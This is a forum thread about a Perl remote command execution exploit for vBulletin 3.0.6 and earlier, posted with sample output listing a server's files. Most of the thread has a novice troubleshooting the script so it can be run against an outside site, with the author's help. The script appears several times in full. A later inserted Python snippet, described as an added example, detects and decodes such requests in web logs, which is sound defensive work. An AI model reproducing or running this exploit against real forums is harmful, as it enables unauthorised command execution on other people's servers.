www.waraxe.us Forum Index -> All other software -> vbulletin <=3.0.6 misc.php remote execution (perl)
vbulletin <=3.0.6 misc.php remote execution (perl)
Posted: Tue Sep 20, 2005 3:27 pm
subzero
Valuable expert
Joined: Mar 16, 2005
Posts: 42

Quote:
#!/usr/bin/perl

# vBulletin <= 3.0.6 Add templates remote execute exploit (perl)
# suBzero@kisobox.com
# Reference: http://www.securityfocus.com/bid/12622/info
#

use IO::Socket;

if (@ARGV < 3)
{
print q(
[+] vBulletin <= 3.0.6 Add templates
[+] suBzero@kisobox.com
[+] Reference: http://www.securityfocus.com/bid/12622/info
[+] Usage : vbulletin306.pl example.com /forums/ "uname id" ;
);
exit;
}

$serv = $ARGV[0];
$dir = $ARGV[1];
$cmd = $ARGV[2];

$serv =~ s/(http:\/\/)//eg;
print "\n";
print " [+] vBulletin 3.0.6 kisobox.com \r\n";
print " [+] Sending regard to $serv$dir \r\n";
print " [+] Command $cmd \r\n";
print " [+] Exploiting on progress \r\n";

$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this
$byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
$data = $dir;
$data .= "misc.php?do=page&template={\${passthru($byte)}}";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\r\n";

print $sock "GET $data HTTP/1.1\n";
print $sock "Host: $serv\n";
print $sock "Accept: */*\n";
print $sock "Content-Length: ".length($data)." \n".
print $sock "Connection: close\n\n";

$on = 0; #flag

while ($res = <$sock>)
{
if ($res =~ /^_END_/)
{ print "---------------------------------------------\r\n"; exit();}
if ($on == 1) { print "$res"; }
if ($res =~ /^_START_/)
{ $on = 1; }
}
print "[-] Exploit failed \r\n";
print "---------------------------------------------\r\n";


http://kisobox.com/exploits/vbulletin306.txt
save as .pl

example exploit

C:\>perl vbulletin306.pl xxx /forums/ "ls -la"

[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to xxx/forums/
[+] Command ls -la
[+] Exploiting on progress

1000
total 1204
drwxr-xr-x 15 511 root 4096 Sep 13 15:21 .
drwxrwxr-x 54 wwwuser wwwuser 4096 Jul 18 11:18 ..
-rw------- 1 root root 23910 Sep 19 16:01 DEADJOE
drwxr-xr-x 2 root root 4096 Oct 18 2003 admin
drwxr-xr-x 3 root root 4096 Jan 20 2005 admincp
-rw-r--r-- 1 root root 6694 Jan 20 2005 announcement.php
drwxr-xr-x 2 root root 4096 Jan 20 2005 archive
-rw-r--r-- 1 root root 7394 Jan 20 2005 attachment.php
View user's profile Send private message Visit poster's website
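
Seen from the server side, the request built by the script above stands out in a web access log. The Python sketch below is an added example, not part of the original post: it flags misc.php requests whose template parameter carries PHP interpolation syntax and decodes the chr() chain back into the command that was sent. The log lines are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Sep/2005:15:31:02 +0000] "GET /forums/misc.php?do=page&template={${passthru(chr(105).chr(100))}} HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.9 - - [20/Sep/2005:15:32:10 +0000] "GET /forums/misc.php?do=page&template=%7B%24%7Bpassthru(chr(108).chr(115))%7D%7D HTTP/1.1" 200 734 "-" "-"',
    '192.0.2.44 - - [20/Sep/2005:15:33:45 +0000] "GET /forums/misc.php?do=showsmilies HTTP/1.1" 200 4312 "-" "Mozilla/5.0"',
    '192.0.2.45 - - [20/Sep/2005:15:34:01 +0000] "GET /forums/misc.php?do=page&template=faq HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
CHR_RE = re.compile(r"chr\((\d{1,3})\)")


def decode_chr_chain(text):
    """Rebuild the string that a 'chr(105).chr(100)' chain produces."""
    return "".join(chr(int(n)) for n in CHR_RE.findall(text) if int(n) < 256)


def scan_line(line):
    """Return a finding dict for a suspicious misc.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/misc.php"):
        return None
    # parse_qs also percent-decodes, so encoded variants are caught too.
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("template", []):
        # A normal template name is a plain identifier; "${" or "{$" in it
        # is the PHP variable interpolation the posted request relies on.
        if "${" in value or "{$" in value:
            return {
                "client": client,
                "template": value,
                "decoded_command": decode_chr_chain(value),
            }
    return None


def scan(lines):
    return [hit for hit in map(scan_line, lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["client"], "->", hit["decoded_command"])
```
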
Posted: Sat Feb 25, 2006 11:56 am
lookatmenow
Regular user
Joined: Feb 24, 2006
Posts: 21

i downloaded perl, put it in c:\perl

however, when i go to properties for command prompt, i change the starting directory to c:\

which comes up as c:\> when i open it. then i type in perl after that, which gives me c:\>perl

it says ''perl is not recognised as an internal or external command, operable programme or batch file''.

i then went back to the properties of the command prompt and changed the default directory to c:\perl

and when i open command prompt i type in after c:\perl>vbulletin306.pl although this merely opens the vbulletin.pl file in to notepad.

i've tried executing the whole line with c:\perl>vbulletin306.pl website.com /forums/ "Is -la" then hit enter... and the same happens, just opens the .pl file in to notepad.

would like to know where i'm going wrong. cheers.
Posted: Sun Feb 26, 2006 4:37 am
subzero
Valuable expert
Joined: Mar 16, 2005
Posts: 42

go to any open folder >> view >> folder option and disable by clicking the extension disable.

change save file to .pl .
I guess your previous file was saved as vb306.pl.txt.
Correct me if I'm wrong.
Posted: Sun Feb 26, 2006 11:53 am
lookatmenow
Regular user
Joined: Feb 24, 2006
Posts: 21

It's saved as vb306.pl. Although when I look at the properties, its default program to open with is still 'notepad'. Should that be changed?
Posted: Sun Feb 26, 2006 3:39 pm
lookatmenow
Regular user
Joined: Feb 24, 2006
Posts: 21

Quote:

c:\>perl vbulletin306.pl
Backslash found where operator expected at vbulletin306.pl line 1, near "rtf1\"
Backslash found where operator expected at vbulletin306.pl line 1, near "ansi\"
Backslash found where operator expected at vbulletin306.pl line 1, near "ansicpg
1252\"
Backslash found where operator expected at vbulletin306.pl line 1, near "deff0\"

Backslash found where operator expected at vbulletin306.pl line 1, near "f0\"
Backslash found where operator expected at vbulletin306.pl line 1, near "fswiss\
"
syntax error at vbulletin306.pl line 1, near "rtf1\"
syntax error at vbulletin306.pl line 1, near "}}"
Execution of vbulletin306.pl aborted due to compilation errors.


I've got it working now, 'perl' that is. However, now there is this error that comes up. Here is the script of the vbulletin306.pl file:

Quote:

{\rtf1\ansi\ansicpg1252\deff0\deflang2057{\fonttbl{\f0\fswiss\fcharset0 Arial;}}
{\*\generator Msftedit 5.41.15.1507;}\viewkind4\uc1\pard\f0\fs20 #!/usr/bin/perl\par
\par
# vBulletin <= 3.0.6 Add templates remote execute exploit (perl)\par
# suBzero@kisobox.com\par
# Reference: http://www.securityfocus.com/bid/12622/info\par
#\par
\par
use IO::Socket;\par
\par
if (@ARGV < 3)\par
\{\par
print q(\par
[+] vBulletin <= 3.0.6 Add templates \par
[+] suBzero@kisobox.com\par
[+] Reference: http://www.securityfocus.com/bid/12622/info\par
[+] Usage : vbulletin306.pl example.com /forums/ "uname id" ;\par
); \par
exit;\par
\}\par
\par
$serv = $ARGV[0];\par
$dir = $ARGV[1];\par
$cmd = $ARGV[2];\par
\par
$serv =~ s/(http:\\/\\/)//eg;\par
print "\\n";\par
print " [+] vBulletin 3.0.6 kisobox.com \\r\\n";\par
print " [+] Sending regard to $serv$dir \\r\\n";\par
print " [+] Command $cmd \\r\\n";\par
print " [+] Exploiting on progress \\r\\n";\par
\par
$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this\par
$byte = join('.', map \{ $_ = 'chr('.$_.')' \} unpack('C*', $cmd)); \par
$data = $dir;\par
$data .= "misc.php?do=page&template=\{\\$\{passthru($byte)\}\}";\par
\par
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\\r\\n";\par
\par
print $sock "GET $data HTTP/1.1\\n";\par
print $sock "Host: $serv\\n";\par
print $sock "Accept: */*\\n";\par
print $sock "Content-Length: ".length($data)." \\n".\par
print $sock "Connection: close\\n\\n";\par
\par
$on = 0; #flag\par
\par
while ($res = <$sock>)\par
\{\par
if ($res =~ /^_END_/) \par
\{ print "---------------------------------------------\\r\\n"; exit();\}\par
if ($on == 1) \{ print "$res"; \}\par
if ($res =~ /^_START_/) \par
\{ $on = 1; \}\par
\}\par
print "[-] Exploit failed \\r\\n";\par
print "---------------------------------------------\\r\\n";\par
}


Is the script perhaps wrong? Although it is the one from kisobox.com/exploits/vbulletin306.txt
Posted: Sun Feb 26, 2006 3:47 pm
lookatmenow
Regular user
Joined: Feb 24, 2006
Posts: 21

o.k. Feel as though i'm getting closer. Although I now get this error:

Quote:

C:\>perl vb306.pl site.com /forum/ "Is -la"

[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to site.com/forum/
[+] Command Is -la
[+] Exploiting on progress
Can't locate object method "new" via package "IO::Socket::INET" (perhaps you for
got to load "IO::Socket::INET"?) at vb306.pl line 17.

c:\>


The script I now have in the .pl file is this:

Quote:

$serv = $ARGV[0];
$dir = $ARGV[1];
$cmd = $ARGV[2];

$serv =~ s/(http:\/\/)//eg;
print "\n";
print " [+] vBulletin 3.0.6 kisobox.com \r\n";
print " [+] Sending regard to $serv$dir \r\n";
print " [+] Command $cmd \r\n";
print " [+] Exploiting on progress \r\n";

$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this
$byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
$data = $dir;
$data .= "misc.php?do=page&template={\${passthru($byte)}}";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\r\n";

print $sock "GET $data HTTP/1.1\n";
print $sock "Host: $serv\n";
print $sock "Accept: */*\n";
print $sock "Content-Length: ".length($data)." \n".
print $sock "Connection: close\n\n";

$on = 0; #flag

while ($res = <$sock>)
{
if ($res =~ /^_END_/)
{ print "---------------------------------------------\r\n"; exit();}
if ($on == 1) { print "$res"; }
if ($res =~ /^_START_/)
{ $on = 1; }
}
print "[-] Exploit failed \r\n";
print "---------------------------------------------\r\n";


Sorry about the number of posts. I'm quite the spammer ;)
Posted: Sun Feb 26, 2006 4:11 pm
lookatmenow
Regular user
Joined: Feb 24, 2006
Posts: 21

Sorted. ;)

I used the text from your quote in that first post, and made that the 'vb306.pl' file. I finally get to the 'exploit part', however I always get 'exploit failed', without the rest of the text following:

Quote:

c:\>perl vb306.pl site.com /forums/ "Is -la"

[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to site.com/forums/
[+] Command Is -la
[+] Exploiting on progress
[-] Exploit failed
---------------------------------------------

c:\>


Does this mean their forums are patched, to stop this exploit?